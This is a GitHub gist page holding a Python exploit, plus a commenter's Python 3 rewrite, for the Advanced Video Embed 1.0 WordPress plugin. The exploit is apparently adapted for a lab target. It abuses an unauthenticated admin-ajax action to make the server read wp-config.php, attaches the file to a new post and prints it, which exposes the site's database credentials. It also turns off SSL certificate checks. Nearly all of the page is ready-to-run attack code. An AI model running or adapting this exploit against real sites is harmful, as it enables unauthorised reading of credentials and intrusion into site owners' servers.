Skip to content

Instantly share code, notes, and snippets.

@kongwenbin

kongwenbin/39646.py

Last active March 3, 2024 21:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kongwenbin/8e89f553641bd76b1ee4bb93460fbb2c to your computer and use it in GitHub Desktop.
Save kongwenbin/8e89f553641bd76b1ee4bb93460fbb2c to your computer and use it in GitHub Desktop.
Download ZIP
Modified exploit for WordPress Plugin Advanced Video 1.0 - Local File Inclusion - fixed the SSL issue
Raw
39646.py
#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
# Timeline
# 03/24/2016 - Bug discovered
# 03/24/2016 - Initial notification of vendor
# 04/01/2016 - No answer from vendor, public release of bug
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
# function ave_publishPost(){
# $title = $_REQUEST['title'];
# $term = $_REQUEST['term'];
# $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
# $image_data = file_get_contents($thumb);
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
import random
import urllib2
import re
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.117.136:12380/blogblog/" # insert url to wordpress
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
for line in content:
numbers = re.findall(r'\d+',line)
id = numbers[-1]
id = int(id) / 10
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
urls=re.findall('"(https?://.*?)"', line)
print urllib2.urlopen(urls[0]).read()
@daVinci13
Copy link

Python3 rewrite

import random
import requests
import re

url = "https://192.168.117.136:12380/blogblog/"  # Insert the URL to your WordPress site

randomID = int(random.random() * 100000000000000000)

# Make the first request
response1 = requests.get(f"{url}/wp-admin/admin-ajax.php?action=ave_publishPost&title={randomID}&short=rnd&term=rnd&thumb=../wp-config.php")
content1 = response1.text.splitlines()

for line in content1:
    numbers = re.findall(r'\d+', line)
    id = numbers[-1]
    id = int(id) // 10

# Make the second request
response2 = requests.get(f"{url}/?p={id}")
content2 = response2.text.splitlines()

for line in content2:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls = re.findall('"(https?://.*?)"', line)
        image_content = requests.get(urls[0]).content
        print(image_content.decode('utf-8'))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment